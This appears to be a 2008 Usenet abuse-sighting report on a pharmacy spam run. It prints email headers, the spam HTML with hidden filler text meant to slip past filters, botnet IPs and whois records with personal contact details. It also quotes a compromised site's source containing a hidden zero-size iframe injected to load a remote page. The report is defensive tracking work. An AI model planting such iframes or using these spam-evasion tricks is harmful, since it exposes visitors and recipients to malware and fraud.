Spamvert Image Hosting URL:
http://www.dicapopipes.com.ar/share_photos.gif
www.dicapopipes.com.ar IP 200.61.58.2
(at telmex.net.ar / AT&T Argentina S.A.)
www.theirfear.com => botnet
theirfear.com Resolved to 220.214.90.180 to 58.233.67.27 to
59.149.238.83 to 65.2.233.177 to 68.50.244.32 to 69.217.48.33 to
70.230.156.188 to 71.170.85.91 to 74.128.136.74 to 78.99.218.250 to
82.212.13.213 to 84.51.86.235 to 87.228.105.211 to 123.202.78.216 to
123.202.193.70 to 124.80.101.135 to 125.130.11.140 to 211.192.194.58
to 219.240.79.58 to 220.94.144.187
Title: European Pharmacy (aka Canadian Pharmacy)
WEB:
(c) Copyright Canadian Pharmacy, 2003-2008. All Rights Reserved.
Much More Canadian Pharmacy sightings:
http://groups.google.com/groups/search?q=%22Canadian+Pharmacy%22+group%3A*abuse&start=0&scoring=d&
Plenty of Forged Certificates and logos as always.
SEE sender identity and headers forgery by spammer spoofing our
domain.
Much More info below:
==================
X-SID-PRA: Weekly News <[MUNGED]>
X-Message-Info: 6sSXyD95QpXovcc6h/ma5IMw7UkL2VHPoHSef5c91Lcdd8jz7Ric6GKvReA7qkvcaV35qp5rC4RiSqW/hNwWPQ=
Received: from tomts49-srv.bellnexxia.net ([209.226.175.193]) by bay0-pamc1-f1.bay0.hotmail.com
with Microsoft SMTPSVC(6.0.3790.2444);
Fri, 4 Apr 2008 03:43:32 -0700
Received: from toip19.srvr.bell.ca ([67.69.240.21])
by toip51.srvr.bell.ca with ESMTP; 04 Apr 2008 06:43:30 -0400
Received: from [MUNGED]
by toip19.srvr.bell.ca with ESMTP; 04 Apr 2008 06:43:30 -0400
Received: (qmail 3182 invoked by uid 110); 4 Apr 2008 06:43:29 -0400
Delivered-To: [MUNGED]
Received: (qmail 3176 invoked from network); 4 Apr 2008 06:43:29 -0400
Received: from eth-221.160-homell.natm.ru (HELO Natali)
(84.242.221.160)
by [MUNGED] with SMTP; 4 Apr 2008 06:43:29 -0400
Received: (qmail 31515 by uid 512); Fri, 4 Apr 2008 02:43:36 +0300
Message-Id: <20080404054336.31517.qmail@Natali>
To: <[MUNGED]>
Subject: Hot Alert [MUNGED]
From: Weekly News <[MUNGED]>
Content-Type: text/html
X-Antivirus: avast! (VPS 080404-0, 04.04.2008), Outbound message
X-Antivirus-Status: Clean
Date: Fri, 4 Apr 2008 06:43:31 -0400
Return-Path: anmcon...@yahoo.com
X-OriginalArrivalTime: 04 Apr 2008 10:43:32.0151 (UTC)
FILETIME=[B9EDEC70:01C89640]
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://
www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<style>
<h3>The Discovery of the Ajan Treasures</h3>
<p>One day, 14-year-old Jessica Hoshi and her friends Shannon, Ranko,
Talitha and Alanna found a mysterious trunk in the attic of Jessica's
house sealed with a magical lock.</p>
<p>With only a touch, Jessica opened the lock and discovered what was
hidden inside. She found a beautiful jewelry box containing five
priceless enchanted artifacts known as the Ajan Treasures.</p>
<p>Jessica and her friends later learned the Ajan Treasures are
legendary weapons in disguise: weapons that give her and her friends
the power to transform into magical warriors, each with different
abilities.</p>
<p>Alanna's platinum bracelet gives her the powers of snow and ice,
and she fights with an enchanted staff called the Quarterseeker.</p>
<p>Talitha's emerald barrette transmutes into living armor called the
Goldenwood Shield. She fights with the power of plants, trees and
flowers.</p>
<p>Shannon's sapphire ring becomes the Obsidian Longbow. She can use
it to transform into the Starlight Huntress and summon a midnight
black cougar to help her fight.</p>
<p>Ranko's silver necklace can transmute into Thundercaller, the
mighty iron warhammer that gives her the power of sound, lightning and
the sea.</p>
<p>Jessica's treasure is the most poweful of all! Her celestium charm
becomes Noble Aria, the golden sword with a blade that burns with the
flames of the sun! Jessica fights with the powers of light, fire and
music!</p>
<p>Jessica and her friends can wear the Ajan Treasures just like real
jewelry, so they will always have their powers and weapons ready to
transform and do battle with the evil minions of the Cryptics!</p>
<p style="font-style: italic; font-weight: bold; color: rgb(170, 0,
0); font-size: 124%;">"WOW! LadyStar just keeps getting better and
better!"<br>
<font style="font-style: italic; font-size: 70%;">Carissa</font></p>
<div style="text-align: center;">
</a><font style="margin-top: 5px; font-style: italic; color: rgb(136,
0, 136);">A spooky narrow passage through the Obsidian Cliffs near
Mudwood</font>
</div>
<p></p>
<h3>Meet new friends!</h3>
<p>Jessica Hoshi loves to play music on her saxophone, so she decided
to try out for the Tree Shores High School Marching Band, one of the
finest performance bands around.</style></p>
<a href="http://www.theirfear.com" title="link"><img src="http://
www.dicapopipes.com.ar/share_photos.gif" alt="link" border=0></a>
<p><style>On the first day of band practice, she met shy Talitha
Hayashi, who studied piano for years and joined the band as a
glockenspiel player. She also met Shannon Ka Yoru, an older band
member and second-chair trumpet player who helped lead Jessica's group
during rehearsals.</p>
<p>Second Drum Major Alanna Kawa was in charge of all the summer
rehearsals, and on the way to practice one day, Jessica met Ranko
Yorozu, an electric guitar player who volunteered for the band, but
only because she wanted to play crash cymbals.</p>
<p>Jessica was appointed an assistant drummer by Leila Hakumei, a
first-chair percussionist in the same class as Shannon, and on the way
home one day, Jessica and her friends met little Cecilia Daichi, who
watched band practice every day after school with her enormous sleepy
cat named Hikousen.</p>
<p>Jessica and her new friends spend their <b style="color: black;
background-color: rgb(255, 255, 102);">free</b> time at Doubler's
Pizza, the baseball-themed unofficially official hangout of the Tree
Shores High School Lions Marching Band. They also get to see each
other every day in the Tree Shores Band Room, where they discuss just
about everything from music to parties, video games, hobbies and
friends.</p>
<p>Whether its Jessica's latest fishing adventures or cooking
disasters, Ranko's great sports victories or guitar riffs, Talitha's
amazing astronomical studies and nature hiking trips, Alanna's search
for the perfect pizza between Drum Major competitions, Cici's coloring
projects and video game victories, Leila's philosophical philosophies
and drumset solos, or Shannon's incredible drawings, flugelhorn and
trumpet playing, you can be sure there is always something interesting
going on at the Tree Shores High School Band Room every day!</p>
<p style="font-style: italic; font-weight: bold; color: rgb(170, 0,
0); font-size: 124%;">"I have five daughters. Finally something for
my girls."<br>
</style>
<font style="font-style: italic; font-size: 70%;">Aaron</font></p>
</body>
</html>
-- END OF SPAM --
See also European Pharmacy sightings:
http://groups.google.com/groups/search?q=%22European+Pharmacy%22+group%3A*abuse*&qt_s=Search
Identical spam as for collectwhole.com, planerise.com, seapast.com,
moonshort.com, letterclock, pleaseselect.com, liftplural.com,
samegentle.com => All Botnet
OLD Listing:
SBL61248 - ROK4932 / SBL61418, SBL61896, SBL62483
http://www.spamhaus.org/rokso/evidence.lasso?rokso_id=ROK4932
WEB:
Licensed by The College of Pharmacists of British Columbia.
If you have any questions or concerns you can contact the college at
200-1765 West 8th Ave. Vancouver, BC, Canada V6J 5C6
You may contact us at +1(210) 888-9089, please, keep your order I.D.
every time you make a call
(c) Copyright Canadian Pharmacy, 2003-2008. All Rights Reserved.
More spammer sightings:
http://groups.google.com/groups/search?q=%22September+70%25%22+group%3A*abuse&start=0&scoring=d&
See:
IP 84.242.221.160 eth-221.160-homell.natm.ru
http://moensted.dk/spam/?addr=84.242.221.160
http://spamcop.net/w3m?action=checkblock&ip=84.242.221.160
route: 84.242.192.0/18
descr: DATACOM-NET
origin: AS16301
notify: mae...@datacom.natm.ru
notify: hun...@keeper.natm.ru
mnt-by: NOVGOROD-MNT
changed: hun...@keeper.natm.ru
Spamvert:
www.theirfear.com => botnet
ns0.nameedns.com IP 211.168.219.196
ns0.nameedns.com IP 203.210.40.116
ns0.nameedns1.com IP 211.172.214.146
ns0.renewwdns.com IP 123.202.89.194
ns0.renewwdns.com IP 219.240.79.58
ns0.renewwdns1.com IP 124.49.113.109
www.theirfear.com has no MX records -> theirfear.com has no MX records
See IP rDNS on botnet:
220.214.90.180 = zd090180.ppp.dion.ne.jp
58.233.67.27 no PTR at HANARO / HANANET / HANANET / Korea
59.149.238.83 = 059149238083.ctinets.com
65.2.233.177 = adsl-2-233-177.mia.bellsouth.net
68.50.244.32 = c-68-50-244-32.hsd1.dc.comcast.net
69.217.48.33 = ppp-69-217-48-33.dsl.applwi.ameritech.net
70.230.156.188 = adsl-70-230-156-188.dsl.stlsmo.sbcglobal.net
71.170.85.91 = static-71-170-85-91.dllstx.fios.verizon.net
74.128.136.74 = 74-128-136-74.dhcp.insightbb.com
78.99.218.250 = adsl-dyn250.78-99-218.t-com.sk
82.212.13.213 = hsi-kbw-082-212-013-213.hsi.kabelbw.de
84.51.86.235 no PTR at trc-odintsovo.ru / odintsovo.info
87.228.105.211 no PTR at ZAO "Infoline" / infoline.su / RU-MOSINFOLINE
123.202.78.216 = 123202078216.ctinets.com
123.202.193.70 = 123202193070.ctinets.com
124.80.101.135 no PTR at GINAMHANVITNET / naver.com / tbroad.com /
Korea
125.130.11.140 no PTR at KORnet / kt.co.kr / Korea
211.192.194.58 no PTR at KORnet / kt.co.kr / Korea
219.240.79.58 no PTR at HANANET-HIGHBAN-INTERNETCLUBTZ / hanaro.com /
Korea
220.94.144.187 no PTR at KORnet / kt.co.kr / Korea
AND:
IP 211.168.219.196 no PTR at BORANET / LG DACOM / Korea
IP 203.210.40.116 no PTR at Vitssen-INFRA / GSD / tbroad.com / Korea
IP 211.172.214.146 no PTR at KNCTV / gsgbi.co.kr / Korea
IP 123.202.89.194 = 123202089194.ctinets.com
IP no PTR at HANANET-HIGHBAN-INTERNETCLUBTZ / hanaro.com / Korea
IP 124.49.113.109 no PTR at Xpeed / powercomm.com / Korea
Let's see whois.paycenter.com.cn:
Domain Name: theirfear.com
Registrant:
given
417 W 6th St
Administrative Contact:
given sa
given
417 W 6th St
muncie
United States
tel: 86 0 8969577
fax: 86 0 8969577
locatetwotits[]gmail.com
Technical Contact:
given sa
given
417 W 6th St
muncie
United States
tel: 86 0 8969577
fax: 86 0 8969577
locate...@gmail.com
Billing Contact:
given sa
given
417 W 6th St
muncie
United States
tel: 86 0 8969577
fax: 86 0 8969577
locate...@gmail.com
Registration Date: 2008-02-20
Update Date: 2008-03-13
Expiration Date: 2009-02-20
Primary DNS: ns0.RENEWWDNS.com 219.240.79.58
Secondary DNS: ns0.NAMEEDNS.com 203.210.40.116
More theirfear.com sightings:
http://groups.google.com/groups/search?q=theirfear.com+group%3A*abuse*&qt_s=Search
Spamvert Image Hosting URL:
http://www.dicapopipes.com.ar/share_photos.gif
Source Code:
HTTP/1.1 200 OK
Date: Fri, 04 Apr 2008 14:15:47 GMT
Server: Apache/1.3.33 (Unix) FrontPage/5.0.2.2635 mod_throttle/3.1.2
mod_layout/3.2 PHP/4.3.10
Last-Modified: Tue, 04 Mar 2008 11:09:46 GMT
ETag: "120fb58-76-47cd2dfa"
Accept-Ranges: bytes
Content-Length: 118
Connection: close
Content-Type: text/html
<!-- ~ --><iframe src="http://dilonius.net/counter/index.php"
width="0" height="0" frameborder="0"></i
See:
www.dicapopipes.com.ar IP 200.61.58.2
merapi.switch.ch IP 130.59.211.10
athea.ar IP 200.16.98.2
ctina.ar IP 200.16.97.17
ns1.retina.ar IP 200.10.202.3
relay1.mecon.gov.ar IP 168.101.16.10
a.ns.dicapopipes.com.ar IP 200.61.58.1
b.ns.dicapopipes.com.ar IP 200.61.58.2
MX
a.mx.dicapopipes.com.ar IP 200.61.58.1
www.dicapopipes.com.ar has no MX records -> [dicapopipes.com.ar has 1
MX record a.mx.dicapopipes.com.ar (0)]
http://moensted.dk/spam/?addr=200.61.58.2
http://dnsbl.net.au/lookup/?200.61.58.2
inetnum: 200.61.32/19
status: allocated
owner: AT&T Argentina S.A.
ownerid: AR-KLSA-LACNIC
responsible: Juan Pablo Romero Lopez
e-mail: juanpabl...@TELMEX.COM
address: Garay, 34,
address: C1063AB - Buenos Aires -
country: AR
route: 200.61.32.0/19
descr: TELMEX-NET11-TO-NET14
origin: AS11664
mnt-by: MAINT-AS11664
changed: interne...@telmex.com
route: 200.61.58.0/24
descr: Metrored
descr: Proxy-registered route
origin: AS26623
mnt-by: MAINT-AS6140
changed: ad...@impsat.com
Let's see whois at nic.ar:
Entidad Registrante: So&ora Granda, Jose Adrian
País: Argentina
Actividad: Electronica
Datos en Argentina
Domicilio: Chivilcoy 4885
Ciudad/Localidad: Autonoma de Buenos Aires
Provincia: Buenos Aires
Código Postal: 1419
Teléfono: 4501-7578
Fax: 4501-7578
Persona Responsable: Marcela Blanco
Domicilio: Juramento5177
Ciudad: Capital Federal
Código Postal: 1100
Provincia:
País: Argentina
Teléfono: 4501-7578
Fax: 45017578
Horario de contacto: 8 a 20
Entidad Administradora: Unlugar S.A.
Domicilio: Bauness 1068
Ciudad: Capital Federal
Código Postal: C1427BCN
Provincia:
País: Argentina
Teléfono: 4524-3922
Fax: 4521-2304
Actividad: Hosting Gratuito, ISP
Contacto Técnico: Unlugar S.A. - Contacto Tecnico
Domicilio: Bauness 1068
Ciudad: Capital Federal
Código Postal: C1427BCN
Provincia:
País: Argentina
Teléfono: 4524-3922
Fax: 4521-2304
Horario de contacto: 9,00 a 18,00
Servidores DNS:
DNS Primario: Nombre:ns1.unlugar.com
Dirección IP:
DNS Secundario: Nombre:ns2.unlugar.com
Dirección IP:
More dicapopipes.com.ar sightings:
http://groups.google.com/groups/search?q=dicapopipes.com.ar+group%3A*abuse*&qt_s=Search
Let's see whois.paycenter.com.cn:
Domain Name: nameedns.com
Registrant:
Zhong Yan
CD
610000
Administrative Contact:
Zhong Yan
Zhong Yan
CD
CD Sichuan 610000
China
tel: 86 028 57789334
fax: 86 028 57789334
e3...@hotmail.com
Technical Contact:
Zhong Yan
Zhong Yan
CD
CD Sichuan 610000
China
tel: 86 028 57789334
fax: 86 028 57789334
e3...@hotmail.com
Billing Contact:
Zhong Yan
Zhong Yan
CD
CD Sichuan 610000
China
tel: 86 028 57789334
fax: 86 028 57789334
e3...@hotmail.com
Registration Date: 2007-10-05
Update Date: 2007-11-03
Expiration Date: 2008-10-05
Primary DNS: ns0.RENEWWDNS.com 219.240.79.58
Secondary DNS: ns0.NAMEEDNS.com 79.172.67.231
More nameedns.com sightings:
http://groups.google.com/groups/search?q=nameedns.com+group%3A*abuse*&qt_s=Search
Let's see whois.paycenter.com.cn:
Domain Name: nameedns1.com
Registrant:
Zhong Yan
CD
610000
Administrative Contact:
Zhong Yan
Zhong Yan
CD
CD Sichuan 610000
China
tel: 86 028 57789334
fax: 86 028 57789334
e3...@hotmail.com
Technical Contact:
Zhong Yan
Zhong Yan
CD
CD Sichuan 610000
China
tel: 86 028 57789334
fax: 86 028 57789334
e3...@hotmail.com
Billing Contact:
Zhong Yan
Zhong Yan
CD
CD Sichuan 610000
China
tel: 86 028 57789334
fax: 86 028 57789334
e3...@hotmail.com
Registration Date: 2007-10-05
Update Date: 2007-11-03
Expiration Date: 2008-10-05
Primary DNS: ns0.RENEWWDNS.com 219.240.79.58
Secondary DNS: ns0.NAMEEDNS.com 79.172.67.231
More nameedns1.com sightings:
http://groups.google.com/groups/search?q=nameedns1.com+group%3A*abuse*&qt_s=Search
Let's see whois.paycenter.com.cn:
Domain Name: renewwdns.com
Registrant:
Zhong Yan
CD
610000
Administrative Contact:
Zhong Yan
Zhong Yan
CD
CD Sichuan 610000
China
tel: 86 028 57789334
fax: 86 028 57789334
e3...@hotmail.com
Technical Contact:
Zhong Yan
Zhong Yan
CD
CD Sichuan 610000
China
tel: 86 028 57789334
fax: 86 028 57789334
e3...@hotmail.com
Billing Contact:
Zhong Yan
Zhong Yan
CD
CD Sichuan 610000
China
tel: 86 028 57789334
fax: 86 028 57789334
e3...@hotmail.com
Registration Date: 2007-10-05
Update Date: 2007-11-03
Expiration Date: 2008-10-05
Primary DNS: ns0.RENEWWDNS.com 219.240.79.58
Secondary DNS: ns0.NAMEEDNS.com 79.172.67.231
More renewwdns.com sightings:
http://groups.google.com/groups/search?q=renewwdns.com+group%3A*abuse*&qt_s=Search
Let's see whois.paycenter.com.cn:
Domain Name: renewwdns1.com
Registrant:
Zhong Yan
CD
610000
Administrative Contact:
Zhong Yan
Zhong Yan
CD
CD Sichuan 610000
China
tel: 86 028 57789334
fax: 86 028 57789334
e3...@hotmail.com
Technical Contact:
Zhong Yan
Zhong Yan
CD
CD Sichuan 610000
China
tel: 86 028 57789334
fax: 86 028 57789334
e3...@hotmail.com
Billing Contact:
Zhong Yan
Zhong Yan
CD
CD Sichuan 610000
China
tel: 86 028 57789334
fax: 86 028 57789334
e3...@hotmail.com
Registration Date: 2007-10-05
Update Date: 2007-11-03
Expiration Date: 2008-10-05
Primary DNS: ns0.RENEWWDNS.com 219.240.79.58
Secondary DNS: ns0.NAMEEDNS.com 79.172.67.231
More renewwdns1.com sightings:
http://groups.google.com/groups/search?q=renewwdns1.com+group%3A*abuse*&qt_s=Search
Read more:
http://groups.google.com/group/news.admin.net-abuse.email/msg/83df9a75a123645e
And:
http://groups.google.com/group/news.admin.net-abuse.sightings/msg/759359adfc45d074
And:
http://groups.google.com/group/news.admin.net-abuse.sightings/msg/49642b0bd30a4c3a
Cheers, Tomez
--
All postings to news.admin.net-abuse.sightings are unconfirmed and unverified
unless stated otherwise by the moderators. All opinions expressed above are
considered the opinions of the original poster, not the moderators or their
respective employers. For a copy of the guidelines to this group, see:
http://www.killfile.org/~tskirvin/nana/